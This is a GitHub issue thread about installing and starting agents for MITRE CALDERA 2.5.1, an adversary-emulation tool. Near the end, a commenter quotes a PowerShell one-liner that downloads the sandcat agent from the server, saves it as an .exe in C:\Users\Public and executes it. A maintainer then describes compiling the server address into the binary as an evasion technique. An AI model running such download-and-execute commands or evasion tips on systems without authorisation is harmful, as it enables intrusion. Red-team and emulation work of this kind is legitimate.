### ISSUE TITLE
caldera 2.5.1 - cagent not starting & "Ping failure" from sandcat

### ISSUE THREAD

**Issue by dobermat** [mitre/caldera#1082]
I have installed the Server on Ubuntu 18.04 and the agent on a Windows 10 machine (both are VMware guests on a ESXi server) but when I try to run the agent on Win machine caldera complained it cannot find the _conf.yml_ despite I read it has been deprecated. 

So I created a _conf.yml_ (in teh same directory where cagent.exe is placed) with:

```
url_root : https://10.0.0.253:8888
verify_hostname: false
```

Both VMs are on the same network segment and can ping each others correctly (Windows Firewall disabled).

1) Is a Windows Domain Controller still needed to be able to use this configuration?

Agent is installed as a service and started with the below commands:

```
cagent.exe --startup auto install
cagent.exe start
```

See below the two outputs from the Win machine:
 
![immagine](https://user-images.githubusercontent.com/47844030/72997311-760f7980-3dfc-11ea-90e1-bd9d1a400640.png)

 
![immagine](https://user-images.githubusercontent.com/47844030/72995880-f385ba80-3df9-11ea-92db-198e6c5eb832.png)

Any ideas/hints to make this simple configuration to run correctly?

**Comment by privateducky** [comment]
it looks like you're following the instructions for the old version of CALDERA (< 2.0). 

to use the latest version of CALDERA, you only need to follow the instructions in the README. let me know if you have any questions from there.

**Comment by dobermat** [comment]
No actually I have used the installation procedure using the latest documentation (plus watching some videos/slides I found about the product) but since I cannot see it working correctly I tried to find more info about what could be missing/wrong.

Regarding the Windows client, does it need to be in a DC then?

**Comment by iukea1** [comment]
Getting the same error now on 2.5.1

**Comment by privateducky** [comment]
Caldera 2.0+ does not use cagent or the conf.yml. Can you share what instructions you’re following?

**Comment by dobermat** [comment]
I was following this tutorial/documentation:
https://www.youtube.com/watch?v=GukTj-i3UDg

 plus some old documentation 
https://www.slideshare.net/erikvanbuggenhout/adversary-emulation-using-caldera
https://liberty-shell.com/sec/2018/11/17/caldera/

By the way a quick update on the agent start issue:

I have launched again the script **without** the `while ($true) {...}` and now it got the correct IP of the server in the Powershell Script :

![image](https://user-images.githubusercontent.com/47844030/73063814-faff9f00-3e9f-11ea-9e7d-4b3768f54d15.png)


and now I can see the agent connected from CALDERA Web GUI:

![image](https://user-images.githubusercontent.com/47844030/73063897-2da99780-3ea0-11ea-8f80-219a9326fc62.png)

**Comment by privateducky** [comment]
hey- great! looks like you're up & running now. the YouTube video is a good instructional to follow. I'm not familiar with the other docs you posted - but thanks for sharing!

for the future-- you'll often find the best documentation in our official space: https://caldera.readthedocs.io/en/latest/

**Comment by serracloud** [comment]
I found the simple fix for this was adding the -server flag in doberman's post. I am deploying this server for other people to use so in order to make sure I don't have to continuously troubleshoot their issue, I added that change in lines 79 and 81 of the html page in the ../caldera/plugins/sandcat/templates/sandcat.html file. 

 x.text('$server="'+loc+'"; $url="$server/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("defaultServer", $server); $wc.Headers.add("file","sandcat.go"); ($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and ([io.file]::WriteAllBytes("C:\\Users\\Public\\$name.exe",$data)) | Out-Null; iex "C:\\Users\\Public\\$name.exe **-server $server** -v";');

**Comment by privateducky** [comment]
good point. I went ahead and updated our delivery commands (on the Sandcat GUI) to reflect this. 

when you run one of these commands to deploy an agent, there are two options:

1) you pass in the "server" variable as a header. if you have GoLang installed on the CALDERA server, it will dynamically compile the agent before sending it back to the client. When it does this, it compiles the server variable into the binary-- which means you don't need to use parameters when starting it. this is a great evasion technique. 
2) you pass in the "server" variable as a parameter. pretty straightforward but this will be more visible to the defense.
